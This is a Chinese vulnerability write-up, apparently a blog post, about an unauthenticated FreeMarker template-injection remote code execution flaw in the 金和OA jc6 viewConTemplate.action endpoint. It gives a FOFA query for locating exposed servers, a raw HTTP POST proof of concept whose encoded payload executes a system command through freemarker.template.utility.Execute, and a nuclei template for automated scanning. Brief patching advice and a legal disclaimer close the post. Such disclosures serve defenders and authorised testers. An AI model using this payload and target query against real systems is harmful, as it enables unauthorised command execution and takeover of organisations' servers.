金和OA jc6 viewConTemplate.action存在FreeMarker模板注入漏洞

漏洞描述

金和OA-jc6-viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。

产品界面

fofa语法

body="/jc6/platform/index/styles"

POC

 
  1. POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
  2. Host:
  3. Accept-Encoding: gzip
  4. Content-Type: application/x-www-form-urlencoded
  5. moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1

nuclei验证

 
  1. id: jinhe-OA-jc6-viewConTemplate-RCE
  2. info:
  3. name: 金和OA jc6 viewConTemplate.action存在FreeMarker模板注入漏洞
  4. author: nobody
  5. severity: critical
  6. description: |
  7. 金和OA-jc6-viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。
  8. impact: |
  9. 未经身份验证的攻击者可以利用此漏洞远程代码执行
  10. remediation: |
  11. 升级版本,打补丁
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: body="/jc6/platform/index/styles"
  16. tags: OA,rce
  17. requests:
  18. - raw:
  19. - |
  20. POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
  21. Host: {{Hostname}}
  22. Accept-Encoding: gzip
  23. Content-Type: application/x-www-form-urlencoded
  24. moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
  25. matchers:
  26. - type: dsl
  27. dsl:
  28. - status_code == 200 && contains_all(body,"</clob>")

修复建议

  • 建议升级到最新版本或打补丁
  • 非必要禁止公网访问或白名单访问
  •   申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值